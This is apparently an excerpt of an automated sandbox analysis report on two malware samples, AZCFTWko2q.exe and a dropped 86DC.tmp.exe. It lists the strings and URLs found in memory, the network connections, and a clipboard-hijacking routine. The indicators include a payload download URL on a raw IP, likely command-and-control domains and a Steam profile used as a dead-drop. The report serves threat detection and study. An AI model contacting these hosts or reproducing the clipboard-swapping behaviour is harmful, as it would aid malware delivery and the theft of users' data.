                Source: AZCFTWko2q.exe, 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE
                Source: AZCFTWko2q.exe, 00000000.00000002.3895670011.0000000000A76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeiD
                Source: 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                Source: 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7T
                Source: 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEB
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=ImL_uti9QFBw&l=e
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: 86DC.tmp.exe, 00000003.00000003.1595828887.000000000095C000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1595995349.000000000096B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/
                Source: 86DC.tmp.exe, 00000003.00000003.1595828887.000000000095C000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1595995349.000000000096B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/api
                Source: 86DC.tmp.exe, 00000003.00000003.1595828887.000000000095C000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1595995349.000000000096B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/api2o
                Source: 86DC.tmp.exe, 00000003.00000003.1595828887.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/apio
                Source: 86DC.tmp.exe, 00000003.00000003.1595828887.000000000095C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/i
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: 86DC.tmp.exe, 00000003.00000003.1640135258.0000000000959000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1595828887.000000000095C000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1595995349.000000000096B000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760231719.000000000095C000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000958000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640253542.000000000095A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/
                Source: 86DC.tmp.exe, 00000003.00000002.1760118163.0000000000917000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/api
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                Source: AZCFTWko2q.exe, 00000000.00000002.3895670011.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/
                Source: AZCFTWko2q.exe, 00000000.00000002.3895670011.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/Ds
                Source: AZCFTWko2q.exeString found in binary or memory: https://post-to-me.com/track_prt.php?sub=
                Source: AZCFTWko2q.exe, 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
                Source: AZCFTWko2q.exe, 00000000.00000002.3895670011.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                Source: 86DC.tmp.exe, 00000003.00000003.1640135258.0000000000959000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760231719.000000000095C000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000958000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640253542.000000000095A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sordid-snaked.cyou/apims
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: 86DC.tmp.exe, 00000003.00000003.1640135258.0000000000959000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760231719.000000000095C000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000958000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640253542.000000000095A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                Source: 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760118163.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: 86DC.tmp.exe, 00000003.00000003.1640135258.0000000000959000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760231719.000000000095C000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000958000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640253542.000000000095A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900_
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                Source: 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000944000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: 86DC.tmp.exe, 00000003.00000003.1640135258.0000000000959000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760231719.000000000095C000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000958000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640253542.000000000095A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/
                Source: 86DC.tmp.exe, 00000003.00000003.1640135258.0000000000959000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760231719.000000000095C000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000958000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640253542.000000000095A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/2
                Source: 86DC.tmp.exe, 00000003.00000003.1640135258.0000000000959000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760231719.000000000095C000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000958000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640253542.000000000095A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/pi
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                Source: 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.8:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.207.38:443 -> 192.168.2.8:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.8:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.8:49711 version: TLS 1.2
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
